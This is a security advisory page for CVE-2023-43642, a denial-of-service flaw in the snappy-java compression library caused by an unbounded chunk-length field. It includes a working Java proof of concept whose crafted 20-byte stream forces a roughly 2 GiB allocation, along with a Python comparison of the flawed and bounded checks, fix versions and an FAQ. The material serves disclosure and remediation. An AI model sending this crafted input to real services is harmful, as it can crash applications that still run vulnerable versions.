Severity: 7.5
CWE-770

CVE-2023-43642: Missing upper bound check on chunk length in snappy-java

First published: Mon Sep 25 2023

### Summary

snappy-java is a data compression library in Java. Its SnappyInputStream was found to be vulnerable to Denial of Service (DoS) attacks when decompressing data with a too-large chunk size. Because the chunk length is not checked against an upper bound, an unrecoverable fatal error can occur.

### Scope

All versions of snappy-java up to and including the latest released version, 1.1.10.3. A fix is applied in 1.1.10.4.

### Details

While performing mitigation efforts related to [CVE-2023-34455](https://nvd.nist.gov/vuln/detail/CVE-2023-34455) in Confluent products, our Application Security team closely analyzed the fix that was accepted and merged into snappy-java version 1.1.10.1 in [this](https://github.com/xerial/snappy-java/commit/3bf67857fcf70d9eea56eed4af7c925671e8eaea) commit. The check on [line 421](https://github.com/xerial/snappy-java/commit/3bf67857fcf70d9eea56eed4af7c925671e8eaea#diff-c3e53610267092989965e8c7dd2d4417d355ff7f560f9e8075b365f32569079fR421) only verifies that chunkSize is not negative. We believe that this is an inadequate fix, as it misses an upper-bounds check for overly large positive values such as 0x7FFFFFFF (2,147,483,647 in decimal) before actually [attempting to allocate](https://github.com/xerial/snappy-java/commit/3bf67857fcf70d9eea56eed4af7c925671e8eaea#diff-c3e53610267092989965e8c7dd2d4417d355ff7f560f9e8075b365f32569079fR429) the provided, unverified number of bytes via the `chunkSize` variable. This missing upper-bounds check can lead applications depending upon snappy-java to allocate an inappropriate number of bytes on the heap, which can then cause a java.lang.OutOfMemoryError. Under some specific conditions and contexts, this can lead to a Denial-of-Service (DoS) attack with a direct impact on the availability of dependent implementations that use the snappy-java library for their compression/decompression needs.

### PoC

Compile and run the following code:

```java
package org.example;

import org.xerial.snappy.SnappyInputStream;

import java.io.ByteArrayInputStream;
import java.io.IOException;

public class Main {
    public static void main(String[] args) throws IOException {
        // 16-byte snappy-java stream header (8-byte magic "\x82SNAPPY\0",
        // 4-byte version, 4-byte compatible version) followed by a
        // 4-byte big-endian chunk length of 0x7fffffff (2,147,483,647).
        byte[] data = {
            -126, 'S', 'N', 'A', 'P', 'P', 'Y', 0,              // magic
            0, 0, 0, 0,                                         // version
            0, 0, 0, 0,                                         // compatible version
            (byte) 0x7f, (byte) 0xff, (byte) 0xff, (byte) 0xff  // chunk length
        };
        SnappyInputStream in = new SnappyInputStream(new ByteArrayInputStream(data));
        byte[] out = new byte[50];
        try {
            // The chunk length passes the negative-value check and is used
            // directly as the buffer size, so this read tries to allocate ~2 GiB.
            in.read(out);
        } catch (Exception ignored) {
            // Only IOException-style failures land here; java.lang.OutOfMemoryError
            // is an Error, not an Exception, and propagates out of main().
        }
    }
}
```

### Impact

Denial of Service of applications dependent on snappy-java, especially if `ExitOnOutOfMemoryError` or `CrashOnOutOfMemoryError` is configured on the JVM.

### Credits

Jan Werner, Mukul Khullar and Bharadwaj Machiraju from Confluent's Application Security team.

We kindly request that a new CVE ID be assigned once you acknowledge this vulnerability.
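The two checks the advisory contrasts, written out side by side over the same framed input, as an added example (this is not snappy-java's code; the stream layout is taken from the PoC bytes above, while the 512 MiB cap, the function names and the benign and negative sample inputs are this example's own assumptions):

```python
import struct
from typing import Callable, Optional

# snappy-java framed stream layout, as seen in the PoC bytes above: an 8-byte
# magic ("\x82SNAPPY\0"), a 4-byte version and a 4-byte minimum-compatible
# version (16 bytes in total), then repeated chunks of [4-byte length][payload].
# Integers are big-endian, signed 32-bit, matching Java's int.
MAGIC = b"\x82SNAPPY\x00"
HEADER_LEN = 16

# Assumed cap for this example only (not a snappy-java constant): the largest
# single chunk this decoder is willing to allocate a buffer for.
MAX_CHUNK_SIZE = 512 * 1024 * 1024  # 512 MiB


def read_int(data: bytes, offset: int) -> int:
    """Read a big-endian signed 32-bit int, as a Java readInt would."""
    if len(data) < offset + 4:
        raise ValueError("truncated input")
    return struct.unpack_from(">i", data, offset)[0]


def check_header(data: bytes) -> None:
    if len(data) < HEADER_LEN or data[:len(MAGIC)] != MAGIC:
        raise ValueError("not a snappy-java stream")


def chunk_length_negative_check_only(data: bytes) -> int:
    """Mirror of the 1.1.10.1 check described in the advisory: reject a negative
    length, then trust the value. 0x7FFFFFFF passes and would reach the allocator
    as a ~2 GiB request."""
    check_header(data)
    chunk_size = read_int(data, HEADER_LEN)
    if chunk_size < 0:
        raise ValueError("negative chunk length")
    return chunk_size


def chunk_length_bounded(data: bytes, max_chunk: int = MAX_CHUNK_SIZE) -> int:
    """Hardened variant: reject lengths above an explicit cap before allocating."""
    check_header(data)
    chunk_size = read_int(data, HEADER_LEN)
    if chunk_size < 0 or chunk_size > max_chunk:
        raise ValueError(f"chunk length {chunk_size} outside [0, {max_chunk}]")
    return chunk_size


def requested_allocation(data: bytes, checker: Callable[[bytes], int]) -> Optional[int]:
    """Buffer size the checker would let the decoder allocate, or None if rejected."""
    try:
        return checker(data)
    except ValueError:
        return None


def stream(chunk_len: int, payload: bytes = b"") -> bytes:
    """Build a 16-byte header plus one chunk-length field and optional payload."""
    return MAGIC + struct.pack(">ii", 0, 0) + struct.pack(">i", chunk_len) + payload


# Inputs: the advisory's PoC stream, plus two constructed variants.
POC = stream(0x7FFFFFFF)        # the same 20 bytes as the Java PoC above
BENIGN = stream(32, bytes(32))  # constructed: a plausible 32-byte chunk
NEGATIVE = stream(-1)           # constructed: 0xFFFFFFFF, rejected by both checks

if __name__ == "__main__":
    for name, data in (("poc", POC), ("benign", BENIGN), ("negative", NEGATIVE)):
        print(name,
              "negative-check-only:", requested_allocation(data, chunk_length_negative_check_only),
              "bounded:", requested_allocation(data, chunk_length_bounded))
```

The cap itself is a policy choice for the deployment; what matters is that the comparison happens before the buffer of `chunkSize` bytes is allocated, not after, and that it rejects both signs of out-of-range value rather than only the negative one.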

Credit: security-advisories@github.com

| Affected Software | Affected Version | How to fix |
|---|---|---|
| maven/org.xerial.snappy:snappy-java | <=1.1.10.3 | 1.1.10.4 |
| redhat/snappy-java | <1.1.10.4 | 1.1.10.4 |
| IBM® Engineering Requirements Management DOORS | <=9.7.2.7 | |
| IBM® Engineering Requirements Management DOORS Web Access | <=9.7.2.7 | |
| IBM Cloud Pak for Business Automation | <1.1.10.4 | |



Frequently Asked Questions

  • What is CVE-2023-43642?

    CVE-2023-43642 is a vulnerability in the snappy-java data compression library that allows for Denial of Service attacks when decompressing data with a too-large chunk size.

  • How severe is CVE-2023-43642?

    CVE-2023-43642 has a severity rating of 7.5, which is considered high.

  • Which software is affected by CVE-2023-43642?

    snappy-java versions 1.1.10.3 and earlier are affected by CVE-2023-43642; the fix is in 1.1.10.4.

  • How can I fix CVE-2023-43642?

    To fix CVE-2023-43642, update your snappy-java library to version 1.1.10.4 or later.

  • Where can I find more information about CVE-2023-43642?

    You can find more information about CVE-2023-43642 on the GitHub page of snappy-java, including the fix and release details.

© 2024 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203